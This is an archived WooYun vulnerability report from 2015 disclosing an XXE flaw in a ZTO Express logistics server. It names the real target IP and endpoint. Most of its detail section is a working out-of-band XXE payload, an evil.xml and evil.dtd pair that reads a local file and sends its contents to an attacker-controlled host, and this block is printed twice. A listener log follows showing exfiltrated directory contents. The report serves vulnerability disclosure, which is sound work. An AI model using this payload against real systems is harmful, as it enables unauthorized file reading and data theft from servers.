当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0110215

漏洞标题:中通某处XXE漏洞(可列目录可读文件)

相关厂商:中通速递

漏洞作者: firexp

提交时间:2015-04-24 23:11

修复时间:2015-06-11 10:42

公开时间:2015-06-11 10:42

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-24: 细节已通知厂商并且等待厂商处理中
2015-04-27: 厂商已经确认,细节仅向厂商公开
2015-05-07: 细节向核心白帽子及相关领域专家公开
2015-05-17: 细节向普通白帽子公开
2015-05-27: 细节向实习白帽子公开
2015-06-11: 细节向公众公开

简要描述:

哈哈

详细说明:

此处泄漏你们一个系统的源码https://github.com/jiangjiangwei/ZTO,发现一处URL http://122.225.100.102:10000/GKPDA/commonPost.rubink
evil.xml:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd">
%dtd;
%send;
]>
<root>
<h>
<ver></ver>
<optype>G005</optype>
<manufacturer></manufacturer>
<u_company></u_company>
<u_code></u_code>
<sys_sn></sys_sn>
<key></key>
</h>
<d>
<p>
<a></a>
<b></b>
<c></c>
<d></d>
<e></e>
<f></f>
<g></g>
<h></h>
</p>
</d>
</root>


evil.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://ip/?%file;'>"
>%all;


java写的可以列目录哦.服务器监听返回的数据如下
122.225.100.102 - - [24/Apr/2015:22:31:24 +0800] "GET /?$RECYCLE.BIN%0A123.sql%0A20141017.sql%0A2015-04-09%0A2015-04-09.rar%0A4C5ED7C2EF4FFEA1F8,02148,HUAYU_P1220_V2.0.10,20150408202534.txt%0Aapp%0Aawbsys%0Aemployee.sql%0AExecServer%0Ageenk%0Ageenk.sql%0AGEENKAPP%0AGEENKSOFT%0Ainstantclient_10_2%0Amsdia80.dll%0APDADATA%0ARadmin%0ASCRIPT%0ASystem%20Volume%20Information%0ATools%0AZTO_SH_K86_133%0AZTO_SH_K86_133.rar%0A HTTP/1.1" 403 4958 "-" "Java/1.6.0_20"

漏洞证明:

此处泄漏你们一个系统的源码https://github.com/jiangjiangwei/ZTO,发现一处URL http://122.225.100.102:10000/GKPDA/commonPost.rubink
evil.xml:

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE roottag [
<!ENTITY % file SYSTEM "file:///C:/Windows/win.ini">
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd">
%dtd;
%send;
]>
<root>
<h>
<ver></ver>
<optype>G005</optype>
<manufacturer></manufacturer>
<u_company></u_company>
<u_code></u_code>
<sys_sn></sys_sn>
<key></key>
</h>
<d>
<p>
<a></a>
<b></b>
<c></c>
<d></d>
<e></e>
<f></f>
<g></g>
<h></h>
</p>
</d>
</root>


evil.dtd:

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all
"<!ENTITY &#x25; send SYSTEM 'http://ip/?%file;'>"
>%all;


java写的可以列目录哦.服务器监听返回的数据如下
122.225.100.102 - - [24/Apr/2015:22:31:24 +0800] "GET /?$RECYCLE.BIN%0A123.sql%0A20141017.sql%0A2015-04-09%0A2015-04-09.rar%0A4C5ED7C2EF4FFEA1F8,02148,HUAYU_P1220_V2.0.10,20150408202534.txt%0Aapp%0Aawbsys%0Aemployee.sql%0AExecServer%0Ageenk%0Ageenk.sql%0AGEENKAPP%0AGEENKSOFT%0Ainstantclient_10_2%0Amsdia80.dll%0APDADATA%0ARadmin%0ASCRIPT%0ASystem%20Volume%20Information%0ATools%0AZTO_SH_K86_133%0AZTO_SH_K86_133.rar%0A HTTP/1.1" 403 4958 "-" "Java/1.6.0_20"

修复方案:

版权声明:转载请注明来源 firexp@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-04-27 10:41

厂商回复:

非常感谢您的关注

最新状态:

暂无